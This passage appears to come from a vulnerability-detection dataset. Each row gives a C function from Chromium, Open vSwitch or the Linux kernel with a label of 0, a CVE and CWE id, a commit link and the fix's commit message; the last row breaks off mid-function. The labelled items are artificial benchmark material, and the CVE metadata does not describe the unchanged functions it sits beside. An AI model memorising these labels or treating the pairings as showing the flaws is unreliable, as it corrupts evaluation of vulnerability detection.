bool AppCacheDatabase::InsertOnlineWhiteList( const OnlineWhiteListRecord* record) { if (!LazyOpen(kCreateIfNeeded)) return false; static const char kSql[] = "INSERT INTO OnlineWhiteLists (cache_id, namespace_url, is_pattern)" " VALUES (?, ?, ?)"; sql::Statement statement(db_->GetCachedStatement(SQL_FROM_HERE, kSql)); statement.BindInt64(0, record->cache_id); statement.BindString(1, record->namespace_url.spec()); statement.BindBool(2, record->is_pattern); return statement.Run(); }
C
Chrome
0
CVE-2018-6063
https://www.cvedetails.com/cve/CVE-2018-6063/
CWE-787
https://github.com/chromium/chromium/commit/673ce95d481ea9368c4d4d43ac756ba1d6d9e608
673ce95d481ea9368c4d4d43ac756ba1d6d9e608
Correct mojo::WrapSharedMemoryHandle usage Fixes some incorrect uses of mojo::WrapSharedMemoryHandle which were assuming that the call actually has any control over the memory protection applied to a handle when mapped. Where fixing usage is infeasible for this CL, TODOs are added to annotate follow-up work. Also updates the API and documentation to (hopefully) improve clarity and avoid similar mistakes from being made in the future. BUG=792900 Cq-Include-Trybots: master.tryserver.chromium.android:android_optional_gpu_tests_rel;master.tryserver.chromium.linux:linux_optional_gpu_tests_rel;master.tryserver.chromium.mac:mac_optional_gpu_tests_rel;master.tryserver.chromium.win:win_optional_gpu_tests_rel Change-Id: I0578aaa9ca3bfcb01aaf2451315d1ede95458477 Reviewed-on: https://chromium-review.googlesource.com/818282 Reviewed-by: Wei Li <[email protected]> Reviewed-by: Lei Zhang <[email protected]> Reviewed-by: John Abd-El-Malek <[email protected]> Reviewed-by: Daniel Cheng <[email protected]> Reviewed-by: Sadrul Chowdhury <[email protected]> Reviewed-by: Yuzhu Shen <[email protected]> Reviewed-by: Robert Sesek <[email protected]> Commit-Queue: Ken Rockot <[email protected]> Cr-Commit-Position: refs/heads/master@{#530268}
ScopedHandle WrapMachPort(mach_port_t port) { kern_return_t kr = mach_port_mod_refs(mach_task_self(), port, MACH_PORT_RIGHT_SEND, 1); MACH_LOG_IF(ERROR, kr != KERN_SUCCESS, kr) << "MachPortAttachmentMac mach_port_mod_refs"; if (kr != KERN_SUCCESS) return ScopedHandle(); MojoPlatformHandle platform_handle; platform_handle.struct_size = sizeof(MojoPlatformHandle); platform_handle.type = MOJO_PLATFORM_HANDLE_TYPE_MACH_PORT; platform_handle.value = static_cast<uint64_t>(port); MojoHandle mojo_handle; MojoResult result = MojoWrapPlatformHandle(&platform_handle, &mojo_handle); CHECK_EQ(result, MOJO_RESULT_OK); return ScopedHandle(Handle(mojo_handle)); }
ScopedHandle WrapMachPort(mach_port_t port) { kern_return_t kr = mach_port_mod_refs(mach_task_self(), port, MACH_PORT_RIGHT_SEND, 1); MACH_LOG_IF(ERROR, kr != KERN_SUCCESS, kr) << "MachPortAttachmentMac mach_port_mod_refs"; if (kr != KERN_SUCCESS) return ScopedHandle(); MojoPlatformHandle platform_handle; platform_handle.struct_size = sizeof(MojoPlatformHandle); platform_handle.type = MOJO_PLATFORM_HANDLE_TYPE_MACH_PORT; platform_handle.value = static_cast<uint64_t>(port); MojoHandle mojo_handle; MojoResult result = MojoWrapPlatformHandle(&platform_handle, &mojo_handle); CHECK_EQ(result, MOJO_RESULT_OK); return ScopedHandle(Handle(mojo_handle)); }
C
Chrome
0
CVE-2018-20068
https://www.cvedetails.com/cve/CVE-2018-20068/
CWE-20
https://github.com/chromium/chromium/commit/4f8104c528f0147c7527718d5aa7c9c38c8220d0
4f8104c528f0147c7527718d5aa7c9c38c8220d0
Abort navigations on 304 responses. A recent change (https://chromium-review.googlesource.com/1161479) accidentally resulted in treating 304 responses as downloads. This CL treats them as ERR_ABORTED instead. This doesn't exactly match old behavior, which passed them on to the renderer, which then aborted them. The new code results in correctly restoring the original URL in the omnibox, and has a shiny new test to prevent future regressions. Bug: 882270 Change-Id: Ic73dcce9e9596d43327b13acde03b4ed9bd0c82e Reviewed-on: https://chromium-review.googlesource.com/1252684 Commit-Queue: Matt Menke <[email protected]> Reviewed-by: Camille Lamy <[email protected]> Cr-Commit-Position: refs/heads/master@{#595641}
void Start( std::unique_ptr<network::SharedURLLoaderFactoryInfo> network_loader_factory_info, ServiceWorkerNavigationHandleCore* service_worker_navigation_handle_core, AppCacheNavigationHandleCore* appcache_handle_core, std::unique_ptr<NavigationRequestInfo> request_info, std::unique_ptr<NavigationUIData> navigation_ui_data, network::mojom::URLLoaderFactoryPtrInfo factory_for_webui, int frame_tree_node_id, std::unique_ptr<service_manager::Connector> connector) { DCHECK_CURRENTLY_ON(BrowserThread::IO); DCHECK(base::FeatureList::IsEnabled(network::features::kNetworkService)); DCHECK(!started_); global_request_id_ = MakeGlobalRequestID(); frame_tree_node_id_ = frame_tree_node_id; started_ = true; web_contents_getter_ = base::Bind(&GetWebContentsFromFrameTreeNodeID, frame_tree_node_id); navigation_ui_data_ = std::move(navigation_ui_data); DCHECK(network_loader_factory_info); network_loader_factory_ = network::SharedURLLoaderFactory::Create( std::move(network_loader_factory_info)); if (resource_request_->request_body) { GetBodyBlobDataHandles(resource_request_->request_body.get(), resource_context_, &blob_handles_); } if (factory_for_webui.is_valid()) { url_loader_ = ThrottlingURLLoader::CreateLoaderAndStart( base::MakeRefCounted<network::WrapperSharedURLLoaderFactory>( std::move(factory_for_webui)), CreateURLLoaderThrottles(), 0 /* routing_id */, global_request_id_.request_id, network::mojom::kURLLoadOptionNone, resource_request_.get(), this, kNavigationUrlLoaderTrafficAnnotation, base::ThreadTaskRunnerHandle::Get()); return; } if (request_info->common_params.url.SchemeIsBlob() && request_info->blob_url_loader_factory) { url_loader_ = ThrottlingURLLoader::CreateLoaderAndStart( network::SharedURLLoaderFactory::Create( std::move(request_info->blob_url_loader_factory)), CreateURLLoaderThrottles(), 0 /* routing_id */, global_request_id_.request_id, network::mojom::kURLLoadOptionNone, resource_request_.get(), this, kNavigationUrlLoaderTrafficAnnotation, base::ThreadTaskRunnerHandle::Get()); return; } if (service_worker_navigation_handle_core) { std::unique_ptr<NavigationLoaderInterceptor> service_worker_interceptor = CreateServiceWorkerInterceptor(*request_info, service_worker_navigation_handle_core); if (service_worker_interceptor) interceptors_.push_back(std::move(service_worker_interceptor)); } if (appcache_handle_core) { std::unique_ptr<NavigationLoaderInterceptor> appcache_interceptor = AppCacheRequestHandler::InitializeForMainResourceNetworkService( *resource_request_, appcache_handle_core->host()->GetWeakPtr(), network_loader_factory_); if (appcache_interceptor) interceptors_.push_back(std::move(appcache_interceptor)); } if (signed_exchange_utils::IsSignedExchangeHandlingEnabled()) { interceptors_.push_back(std::make_unique<SignedExchangeRequestHandler>( url::Origin::Create(request_info->common_params.url), request_info->common_params.url, GetURLLoaderOptions(request_info->is_main_frame), request_info->frame_tree_node_id, request_info->devtools_navigation_token, request_info->devtools_frame_token, request_info->report_raw_headers, request_info->begin_params->load_flags, network_loader_factory_, base::BindRepeating( &URLLoaderRequestController::CreateURLLoaderThrottles, base::Unretained(this)))); } std::vector<std::unique_ptr<URLLoaderRequestInterceptor>> browser_interceptors = GetContentClient() ->browser() ->WillCreateURLLoaderRequestInterceptors( navigation_ui_data_.get(), request_info->frame_tree_node_id); if (!browser_interceptors.empty()) { for (auto& browser_interceptor : browser_interceptors) { interceptors_.push_back( std::make_unique<NavigationLoaderInterceptorBrowserContainer>( std::move(browser_interceptor))); } } Restart(); }
void Start( std::unique_ptr<network::SharedURLLoaderFactoryInfo> network_loader_factory_info, ServiceWorkerNavigationHandleCore* service_worker_navigation_handle_core, AppCacheNavigationHandleCore* appcache_handle_core, std::unique_ptr<NavigationRequestInfo> request_info, std::unique_ptr<NavigationUIData> navigation_ui_data, network::mojom::URLLoaderFactoryPtrInfo factory_for_webui, int frame_tree_node_id, std::unique_ptr<service_manager::Connector> connector) { DCHECK_CURRENTLY_ON(BrowserThread::IO); DCHECK(base::FeatureList::IsEnabled(network::features::kNetworkService)); DCHECK(!started_); global_request_id_ = MakeGlobalRequestID(); frame_tree_node_id_ = frame_tree_node_id; started_ = true; web_contents_getter_ = base::Bind(&GetWebContentsFromFrameTreeNodeID, frame_tree_node_id); navigation_ui_data_ = std::move(navigation_ui_data); DCHECK(network_loader_factory_info); network_loader_factory_ = network::SharedURLLoaderFactory::Create( std::move(network_loader_factory_info)); if (resource_request_->request_body) { GetBodyBlobDataHandles(resource_request_->request_body.get(), resource_context_, &blob_handles_); } if (factory_for_webui.is_valid()) { url_loader_ = ThrottlingURLLoader::CreateLoaderAndStart( base::MakeRefCounted<network::WrapperSharedURLLoaderFactory>( std::move(factory_for_webui)), CreateURLLoaderThrottles(), 0 /* routing_id */, global_request_id_.request_id, network::mojom::kURLLoadOptionNone, resource_request_.get(), this, kNavigationUrlLoaderTrafficAnnotation, base::ThreadTaskRunnerHandle::Get()); return; } if (request_info->common_params.url.SchemeIsBlob() && request_info->blob_url_loader_factory) { url_loader_ = ThrottlingURLLoader::CreateLoaderAndStart( network::SharedURLLoaderFactory::Create( std::move(request_info->blob_url_loader_factory)), CreateURLLoaderThrottles(), 0 /* routing_id */, global_request_id_.request_id, network::mojom::kURLLoadOptionNone, resource_request_.get(), this, kNavigationUrlLoaderTrafficAnnotation, base::ThreadTaskRunnerHandle::Get()); return; } if (service_worker_navigation_handle_core) { std::unique_ptr<NavigationLoaderInterceptor> service_worker_interceptor = CreateServiceWorkerInterceptor(*request_info, service_worker_navigation_handle_core); if (service_worker_interceptor) interceptors_.push_back(std::move(service_worker_interceptor)); } if (appcache_handle_core) { std::unique_ptr<NavigationLoaderInterceptor> appcache_interceptor = AppCacheRequestHandler::InitializeForMainResourceNetworkService( *resource_request_, appcache_handle_core->host()->GetWeakPtr(), network_loader_factory_); if (appcache_interceptor) interceptors_.push_back(std::move(appcache_interceptor)); } if (signed_exchange_utils::IsSignedExchangeHandlingEnabled()) { interceptors_.push_back(std::make_unique<SignedExchangeRequestHandler>( url::Origin::Create(request_info->common_params.url), request_info->common_params.url, GetURLLoaderOptions(request_info->is_main_frame), request_info->frame_tree_node_id, request_info->devtools_navigation_token, request_info->devtools_frame_token, request_info->report_raw_headers, request_info->begin_params->load_flags, network_loader_factory_, base::BindRepeating( &URLLoaderRequestController::CreateURLLoaderThrottles, base::Unretained(this)))); } std::vector<std::unique_ptr<URLLoaderRequestInterceptor>> browser_interceptors = GetContentClient() ->browser() ->WillCreateURLLoaderRequestInterceptors( navigation_ui_data_.get(), request_info->frame_tree_node_id); if (!browser_interceptors.empty()) { for (auto& browser_interceptor : browser_interceptors) { interceptors_.push_back( std::make_unique<NavigationLoaderInterceptorBrowserContainer>( std::move(browser_interceptor))); } } Restart(); }
C
Chrome
0
CVE-2011-2350
https://www.cvedetails.com/cve/CVE-2011-2350/
CWE-20
https://github.com/chromium/chromium/commit/b944f670bb7a8a919daac497a4ea0536c954c201
b944f670bb7a8a919daac497a4ea0536c954c201
[JSC] Implement a helper method createNotEnoughArgumentsError() https://bugs.webkit.org/show_bug.cgi?id=85102 Reviewed by Geoffrey Garen. In bug 84787, kbr@ requested to avoid hard-coding createTypeError(exec, "Not enough arguments") here and there. This patch implements createNotEnoughArgumentsError(exec) and uses it in JSC bindings. c.f. a corresponding bug for V8 bindings is bug 85097. Source/JavaScriptCore: * runtime/Error.cpp: (JSC::createNotEnoughArgumentsError): (JSC): * runtime/Error.h: (JSC): Source/WebCore: Test: bindings/scripts/test/TestObj.idl * bindings/scripts/CodeGeneratorJS.pm: Modified as described above. (GenerateArgumentsCountCheck): * bindings/js/JSDataViewCustom.cpp: Ditto. (WebCore::getDataViewMember): (WebCore::setDataViewMember): * bindings/js/JSDeprecatedPeerConnectionCustom.cpp: (WebCore::JSDeprecatedPeerConnectionConstructor::constructJSDeprecatedPeerConnection): * bindings/js/JSDirectoryEntryCustom.cpp: (WebCore::JSDirectoryEntry::getFile): (WebCore::JSDirectoryEntry::getDirectory): * bindings/js/JSSharedWorkerCustom.cpp: (WebCore::JSSharedWorkerConstructor::constructJSSharedWorker): * bindings/js/JSWebKitMutationObserverCustom.cpp: (WebCore::JSWebKitMutationObserverConstructor::constructJSWebKitMutationObserver): (WebCore::JSWebKitMutationObserver::observe): * bindings/js/JSWorkerCustom.cpp: (WebCore::JSWorkerConstructor::constructJSWorker): * bindings/scripts/test/JS/JSFloat64Array.cpp: Updated run-bindings-tests. (WebCore::jsFloat64ArrayPrototypeFunctionFoo): * bindings/scripts/test/JS/JSTestActiveDOMObject.cpp: (WebCore::jsTestActiveDOMObjectPrototypeFunctionExcitingFunction): (WebCore::jsTestActiveDOMObjectPrototypeFunctionPostMessage): * bindings/scripts/test/JS/JSTestCustomNamedGetter.cpp: (WebCore::jsTestCustomNamedGetterPrototypeFunctionAnotherFunction): * bindings/scripts/test/JS/JSTestEventTarget.cpp: (WebCore::jsTestEventTargetPrototypeFunctionItem): (WebCore::jsTestEventTargetPrototypeFunctionAddEventListener): (WebCore::jsTestEventTargetPrototypeFunctionRemoveEventListener): (WebCore::jsTestEventTargetPrototypeFunctionDispatchEvent): * bindings/scripts/test/JS/JSTestInterface.cpp: (WebCore::JSTestInterfaceConstructor::constructJSTestInterface): (WebCore::jsTestInterfacePrototypeFunctionSupplementalMethod2): * bindings/scripts/test/JS/JSTestMediaQueryListListener.cpp: (WebCore::jsTestMediaQueryListListenerPrototypeFunctionMethod): * bindings/scripts/test/JS/JSTestNamedConstructor.cpp: (WebCore::JSTestNamedConstructorNamedConstructor::constructJSTestNamedConstructor): * bindings/scripts/test/JS/JSTestObj.cpp: (WebCore::JSTestObjConstructor::constructJSTestObj): (WebCore::jsTestObjPrototypeFunctionVoidMethodWithArgs): (WebCore::jsTestObjPrototypeFunctionIntMethodWithArgs): (WebCore::jsTestObjPrototypeFunctionObjMethodWithArgs): (WebCore::jsTestObjPrototypeFunctionMethodWithSequenceArg): (WebCore::jsTestObjPrototypeFunctionMethodReturningSequence): (WebCore::jsTestObjPrototypeFunctionMethodThatRequiresAllArgsAndThrows): (WebCore::jsTestObjPrototypeFunctionSerializedValue): (WebCore::jsTestObjPrototypeFunctionIdbKey): (WebCore::jsTestObjPrototypeFunctionOptionsObject): (WebCore::jsTestObjPrototypeFunctionAddEventListener): (WebCore::jsTestObjPrototypeFunctionRemoveEventListener): (WebCore::jsTestObjPrototypeFunctionMethodWithNonOptionalArgAndOptionalArg): (WebCore::jsTestObjPrototypeFunctionMethodWithNonOptionalArgAndTwoOptionalArgs): (WebCore::jsTestObjPrototypeFunctionMethodWithCallbackArg): (WebCore::jsTestObjPrototypeFunctionMethodWithNonCallbackArgAndCallbackArg): (WebCore::jsTestObjPrototypeFunctionOverloadedMethod1): (WebCore::jsTestObjPrototypeFunctionOverloadedMethod2): (WebCore::jsTestObjPrototypeFunctionOverloadedMethod3): (WebCore::jsTestObjPrototypeFunctionOverloadedMethod4): (WebCore::jsTestObjPrototypeFunctionOverloadedMethod5): (WebCore::jsTestObjPrototypeFunctionOverloadedMethod6): (WebCore::jsTestObjPrototypeFunctionOverloadedMethod7): (WebCore::jsTestObjConstructorFunctionClassMethod2): (WebCore::jsTestObjConstructorFunctionOverloadedMethod11): (WebCore::jsTestObjConstructorFunctionOverloadedMethod12): (WebCore::jsTestObjPrototypeFunctionMethodWithUnsignedLongArray): (WebCore::jsTestObjPrototypeFunctionConvert1): (WebCore::jsTestObjPrototypeFunctionConvert2): (WebCore::jsTestObjPrototypeFunctionConvert3): (WebCore::jsTestObjPrototypeFunctionConvert4): (WebCore::jsTestObjPrototypeFunctionConvert5): (WebCore::jsTestObjPrototypeFunctionStrictFunction): * bindings/scripts/test/JS/JSTestSerializedScriptValueInterface.cpp: (WebCore::JSTestSerializedScriptValueInterfaceConstructor::constructJSTestSerializedScriptValueInterface): (WebCore::jsTestSerializedScriptValueInterfacePrototypeFunctionAcceptTransferList): git-svn-id: svn://svn.chromium.org/blink/trunk@115536 bbb929c8-8fbe-4397-9dbb-9b2b20218538
void setJSTestObjWithScriptExecutionContextAttribute(ExecState* exec, JSObject* thisObject, JSValue value) { JSTestObj* castedThis = jsCast<JSTestObj*>(thisObject); TestObj* impl = static_cast<TestObj*>(castedThis->impl()); ScriptExecutionContext* scriptContext = jsCast<JSDOMGlobalObject*>(exec->lexicalGlobalObject())->scriptExecutionContext(); if (!scriptContext) return; impl->setWithScriptExecutionContextAttribute(scriptContext, toTestObj(value)); }
void setJSTestObjWithScriptExecutionContextAttribute(ExecState* exec, JSObject* thisObject, JSValue value) { JSTestObj* castedThis = jsCast<JSTestObj*>(thisObject); TestObj* impl = static_cast<TestObj*>(castedThis->impl()); ScriptExecutionContext* scriptContext = jsCast<JSDOMGlobalObject*>(exec->lexicalGlobalObject())->scriptExecutionContext(); if (!scriptContext) return; impl->setWithScriptExecutionContextAttribute(scriptContext, toTestObj(value)); }
C
Chrome
0
CVE-2018-17206
https://www.cvedetails.com/cve/CVE-2018-17206/
null
https://github.com/openvswitch/ovs/commit/9237a63c47bd314b807cda0bd2216264e82edbe8
9237a63c47bd314b807cda0bd2216264e82edbe8
ofp-actions: Avoid buffer overread in BUNDLE action decoding. Reported-at: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=9052 Signed-off-by: Ben Pfaff <[email protected]> Acked-by: Justin Pettit <[email protected]>
encode_CONJUNCTION(const struct ofpact_conjunction *oc, enum ofp_version ofp_version OVS_UNUSED, struct ofpbuf *out) { struct nx_action_conjunction *nac = put_NXAST_CONJUNCTION(out); nac->clause = oc->clause; nac->n_clauses = oc->n_clauses; nac->id = htonl(oc->id); }
encode_CONJUNCTION(const struct ofpact_conjunction *oc, enum ofp_version ofp_version OVS_UNUSED, struct ofpbuf *out) { struct nx_action_conjunction *nac = put_NXAST_CONJUNCTION(out); nac->clause = oc->clause; nac->n_clauses = oc->n_clauses; nac->id = htonl(oc->id); }
C
ovs
0
null
null
null
https://github.com/chromium/chromium/commit/f2f703241635fa96fa630b83afcc9a330cc21b7e
f2f703241635fa96fa630b83afcc9a330cc21b7e
CrOS Shelf: Get rid of 'split view' mode for shelf background In the new UI, "maximized" and "split view" are treated the same in specs, so there is no more need for a separate "split view" mode. This folds it into the "maximized" mode. Note that the only thing that _seems_ different in shelf_background_animator is ShelfBackgroundAnimator::kMaxAlpha (255) vs kShelfTranslucentMaximizedWindow (254), which should be virtually impossible to distinguish. This CL therefore does not have any visual effect (and doesn't directly fix the linked bug, but is relevant). Bug: 899289 Change-Id: I60947338176ac15ca016b1ba4edf13d16362cb24 Reviewed-on: https://chromium-review.googlesource.com/c/1469741 Commit-Queue: Xiyuan Xia <[email protected]> Reviewed-by: Xiyuan Xia <[email protected]> Auto-Submit: Manu Cornet <[email protected]> Cr-Commit-Position: refs/heads/master@{#631752}
const ui::Layer* GetNonLockScreenContainersContainerLayer() const { const auto* shelf_window = GetShelfWidget()->GetNativeWindow(); return shelf_window->GetRootWindow() ->GetChildById(kShellWindowId_NonLockScreenContainersContainer) ->layer(); }
const ui::Layer* GetNonLockScreenContainersContainerLayer() const { const auto* shelf_window = GetShelfWidget()->GetNativeWindow(); return shelf_window->GetRootWindow() ->GetChildById(kShellWindowId_NonLockScreenContainersContainer) ->layer(); }
C
Chrome
0
CVE-2013-7027
https://www.cvedetails.com/cve/CVE-2013-7027/
CWE-119
https://github.com/torvalds/linux/commit/f5563318ff1bde15b10e736e97ffce13be08bc1a
f5563318ff1bde15b10e736e97ffce13be08bc1a
wireless: radiotap: fix parsing buffer overrun When parsing an invalid radiotap header, the parser can overrun the buffer that is passed in because it doesn't correctly check 1) the minimum radiotap header size 2) the space for extended bitmaps The first issue doesn't affect any in-kernel user as they all check the minimum size before calling the radiotap function. The second issue could potentially affect the kernel if an skb is passed in that consists only of the radiotap header with a lot of extended bitmaps that extend past the SKB. In that case a read-only buffer overrun by at most 4 bytes is possible. Fix this by adding the appropriate checks to the parser. Cc: [email protected] Reported-by: Evan Huus <[email protected]> Signed-off-by: Johannes Berg <[email protected]>
int ieee80211_radiotap_iterator_next( struct ieee80211_radiotap_iterator *iterator) { while (1) { int hit = 0; int pad, align, size, subns; uint32_t oui; /* if no more EXT bits, that's it */ if ((iterator->_arg_index % 32) == IEEE80211_RADIOTAP_EXT && !(iterator->_bitmap_shifter & 1)) return -ENOENT; if (!(iterator->_bitmap_shifter & 1)) goto next_entry; /* arg not present */ /* get alignment/size of data */ switch (iterator->_arg_index % 32) { case IEEE80211_RADIOTAP_RADIOTAP_NAMESPACE: case IEEE80211_RADIOTAP_EXT: align = 1; size = 0; break; case IEEE80211_RADIOTAP_VENDOR_NAMESPACE: align = 2; size = 6; break; default: if (!iterator->current_namespace || iterator->_arg_index >= iterator->current_namespace->n_bits) { if (iterator->current_namespace == &radiotap_ns) return -ENOENT; align = 0; } else { align = iterator->current_namespace->align_size[iterator->_arg_index].align; size = iterator->current_namespace->align_size[iterator->_arg_index].size; } if (!align) { /* skip all subsequent data */ iterator->_arg = iterator->_next_ns_data; /* give up on this namespace */ iterator->current_namespace = NULL; goto next_entry; } break; } /* * arg is present, account for alignment padding * * Note that these alignments are relative to the start * of the radiotap header. There is no guarantee * that the radiotap header itself is aligned on any * kind of boundary. * * The above is why get_unaligned() is used to dereference * multibyte elements from the radiotap area. */ pad = ((unsigned long)iterator->_arg - (unsigned long)iterator->_rtheader) & (align - 1); if (pad) iterator->_arg += align - pad; if (iterator->_arg_index % 32 == IEEE80211_RADIOTAP_VENDOR_NAMESPACE) { int vnslen; if ((unsigned long)iterator->_arg + size - (unsigned long)iterator->_rtheader > (unsigned long)iterator->_max_length) return -EINVAL; oui = (*iterator->_arg << 16) | (*(iterator->_arg + 1) << 8) | *(iterator->_arg + 2); subns = *(iterator->_arg + 3); find_ns(iterator, oui, subns); vnslen = get_unaligned_le16(iterator->_arg + 4); iterator->_next_ns_data = iterator->_arg + size + vnslen; if (!iterator->current_namespace) size += vnslen; } /* * this is what we will return to user, but we need to * move on first so next call has something fresh to test */ iterator->this_arg_index = iterator->_arg_index; iterator->this_arg = iterator->_arg; iterator->this_arg_size = size; /* internally move on the size of this arg */ iterator->_arg += size; /* * check for insanity where we are given a bitmap that * claims to have more arg content than the length of the * radiotap section. We will normally end up equalling this * max_length on the last arg, never exceeding it. */ if ((unsigned long)iterator->_arg - (unsigned long)iterator->_rtheader > (unsigned long)iterator->_max_length) return -EINVAL; /* these special ones are valid in each bitmap word */ switch (iterator->_arg_index % 32) { case IEEE80211_RADIOTAP_VENDOR_NAMESPACE: iterator->_reset_on_ext = 1; iterator->is_radiotap_ns = 0; /* * If parser didn't register this vendor * namespace with us, allow it to show it * as 'raw. Do do that, set argument index * to vendor namespace. */ iterator->this_arg_index = IEEE80211_RADIOTAP_VENDOR_NAMESPACE; if (!iterator->current_namespace) hit = 1; goto next_entry; case IEEE80211_RADIOTAP_RADIOTAP_NAMESPACE: iterator->_reset_on_ext = 1; iterator->current_namespace = &radiotap_ns; iterator->is_radiotap_ns = 1; goto next_entry; case IEEE80211_RADIOTAP_EXT: /* * bit 31 was set, there is more * -- move to next u32 bitmap */ iterator->_bitmap_shifter = get_unaligned_le32(iterator->_next_bitmap); iterator->_next_bitmap++; if (iterator->_reset_on_ext) iterator->_arg_index = 0; else iterator->_arg_index++; iterator->_reset_on_ext = 0; break; default: /* we've got a hit! */ hit = 1; next_entry: iterator->_bitmap_shifter >>= 1; iterator->_arg_index++; } /* if we found a valid arg earlier, return it now */ if (hit) return 0; } }
int ieee80211_radiotap_iterator_next( struct ieee80211_radiotap_iterator *iterator) { while (1) { int hit = 0; int pad, align, size, subns; uint32_t oui; /* if no more EXT bits, that's it */ if ((iterator->_arg_index % 32) == IEEE80211_RADIOTAP_EXT && !(iterator->_bitmap_shifter & 1)) return -ENOENT; if (!(iterator->_bitmap_shifter & 1)) goto next_entry; /* arg not present */ /* get alignment/size of data */ switch (iterator->_arg_index % 32) { case IEEE80211_RADIOTAP_RADIOTAP_NAMESPACE: case IEEE80211_RADIOTAP_EXT: align = 1; size = 0; break; case IEEE80211_RADIOTAP_VENDOR_NAMESPACE: align = 2; size = 6; break; default: if (!iterator->current_namespace || iterator->_arg_index >= iterator->current_namespace->n_bits) { if (iterator->current_namespace == &radiotap_ns) return -ENOENT; align = 0; } else { align = iterator->current_namespace->align_size[iterator->_arg_index].align; size = iterator->current_namespace->align_size[iterator->_arg_index].size; } if (!align) { /* skip all subsequent data */ iterator->_arg = iterator->_next_ns_data; /* give up on this namespace */ iterator->current_namespace = NULL; goto next_entry; } break; } /* * arg is present, account for alignment padding * * Note that these alignments are relative to the start * of the radiotap header. There is no guarantee * that the radiotap header itself is aligned on any * kind of boundary. * * The above is why get_unaligned() is used to dereference * multibyte elements from the radiotap area. */ pad = ((unsigned long)iterator->_arg - (unsigned long)iterator->_rtheader) & (align - 1); if (pad) iterator->_arg += align - pad; if (iterator->_arg_index % 32 == IEEE80211_RADIOTAP_VENDOR_NAMESPACE) { int vnslen; if ((unsigned long)iterator->_arg + size - (unsigned long)iterator->_rtheader > (unsigned long)iterator->_max_length) return -EINVAL; oui = (*iterator->_arg << 16) | (*(iterator->_arg + 1) << 8) | *(iterator->_arg + 2); subns = *(iterator->_arg + 3); find_ns(iterator, oui, subns); vnslen = get_unaligned_le16(iterator->_arg + 4); iterator->_next_ns_data = iterator->_arg + size + vnslen; if (!iterator->current_namespace) size += vnslen; } /* * this is what we will return to user, but we need to * move on first so next call has something fresh to test */ iterator->this_arg_index = iterator->_arg_index; iterator->this_arg = iterator->_arg; iterator->this_arg_size = size; /* internally move on the size of this arg */ iterator->_arg += size; /* * check for insanity where we are given a bitmap that * claims to have more arg content than the length of the * radiotap section. We will normally end up equalling this * max_length on the last arg, never exceeding it. */ if ((unsigned long)iterator->_arg - (unsigned long)iterator->_rtheader > (unsigned long)iterator->_max_length) return -EINVAL; /* these special ones are valid in each bitmap word */ switch (iterator->_arg_index % 32) { case IEEE80211_RADIOTAP_VENDOR_NAMESPACE: iterator->_reset_on_ext = 1; iterator->is_radiotap_ns = 0; /* * If parser didn't register this vendor * namespace with us, allow it to show it * as 'raw. Do do that, set argument index * to vendor namespace. */ iterator->this_arg_index = IEEE80211_RADIOTAP_VENDOR_NAMESPACE; if (!iterator->current_namespace) hit = 1; goto next_entry; case IEEE80211_RADIOTAP_RADIOTAP_NAMESPACE: iterator->_reset_on_ext = 1; iterator->current_namespace = &radiotap_ns; iterator->is_radiotap_ns = 1; goto next_entry; case IEEE80211_RADIOTAP_EXT: /* * bit 31 was set, there is more * -- move to next u32 bitmap */ iterator->_bitmap_shifter = get_unaligned_le32(iterator->_next_bitmap); iterator->_next_bitmap++; if (iterator->_reset_on_ext) iterator->_arg_index = 0; else iterator->_arg_index++; iterator->_reset_on_ext = 0; break; default: /* we've got a hit! */ hit = 1; next_entry: iterator->_bitmap_shifter >>= 1; iterator->_arg_index++; } /* if we found a valid arg earlier, return it now */ if (hit) return 0; } }
C
linux
0
CVE-2016-10150
https://www.cvedetails.com/cve/CVE-2016-10150/
CWE-416
https://github.com/torvalds/linux/commit/a0f1d21c1ccb1da66629627a74059dd7f5ac9c61
a0f1d21c1ccb1da66629627a74059dd7f5ac9c61
KVM: use after free in kvm_ioctl_create_device() We should move the ops->destroy(dev) after the list_del(&dev->vm_node) so that we don't use "dev" after freeing it. Fixes: a28ebea2adc4 ("KVM: Protect device ops->create and list_add with kvm->lock") Signed-off-by: Dan Carpenter <[email protected]> Reviewed-by: David Hildenbrand <[email protected]> Signed-off-by: Radim Krčmář <[email protected]>
void kvm_vcpu_on_spin(struct kvm_vcpu *me) { struct kvm *kvm = me->kvm; struct kvm_vcpu *vcpu; int last_boosted_vcpu = me->kvm->last_boosted_vcpu; int yielded = 0; int try = 3; int pass; int i; kvm_vcpu_set_in_spin_loop(me, true); /* * We boost the priority of a VCPU that is runnable but not * currently running, because it got preempted by something * else and called schedule in __vcpu_run. Hopefully that * VCPU is holding the lock that we need and will release it. * We approximate round-robin by starting at the last boosted VCPU. */ for (pass = 0; pass < 2 && !yielded && try; pass++) { kvm_for_each_vcpu(i, vcpu, kvm) { if (!pass && i <= last_boosted_vcpu) { i = last_boosted_vcpu; continue; } else if (pass && i > last_boosted_vcpu) break; if (!ACCESS_ONCE(vcpu->preempted)) continue; if (vcpu == me) continue; if (swait_active(&vcpu->wq) && !kvm_arch_vcpu_runnable(vcpu)) continue; if (!kvm_vcpu_eligible_for_directed_yield(vcpu)) continue; yielded = kvm_vcpu_yield_to(vcpu); if (yielded > 0) { kvm->last_boosted_vcpu = i; break; } else if (yielded < 0) { try--; if (!try) break; } } } kvm_vcpu_set_in_spin_loop(me, false); /* Ensure vcpu is not eligible during next spinloop */ kvm_vcpu_set_dy_eligible(me, false); }
void kvm_vcpu_on_spin(struct kvm_vcpu *me) { struct kvm *kvm = me->kvm; struct kvm_vcpu *vcpu; int last_boosted_vcpu = me->kvm->last_boosted_vcpu; int yielded = 0; int try = 3; int pass; int i; kvm_vcpu_set_in_spin_loop(me, true); /* * We boost the priority of a VCPU that is runnable but not * currently running, because it got preempted by something * else and called schedule in __vcpu_run. Hopefully that * VCPU is holding the lock that we need and will release it. * We approximate round-robin by starting at the last boosted VCPU. */ for (pass = 0; pass < 2 && !yielded && try; pass++) { kvm_for_each_vcpu(i, vcpu, kvm) { if (!pass && i <= last_boosted_vcpu) { i = last_boosted_vcpu; continue; } else if (pass && i > last_boosted_vcpu) break; if (!ACCESS_ONCE(vcpu->preempted)) continue; if (vcpu == me) continue; if (swait_active(&vcpu->wq) && !kvm_arch_vcpu_runnable(vcpu)) continue; if (!kvm_vcpu_eligible_for_directed_yield(vcpu)) continue; yielded = kvm_vcpu_yield_to(vcpu); if (yielded > 0) { kvm->last_boosted_vcpu = i; break; } else if (yielded < 0) { try--; if (!try) break; } } } kvm_vcpu_set_in_spin_loop(me, false); /* Ensure vcpu is 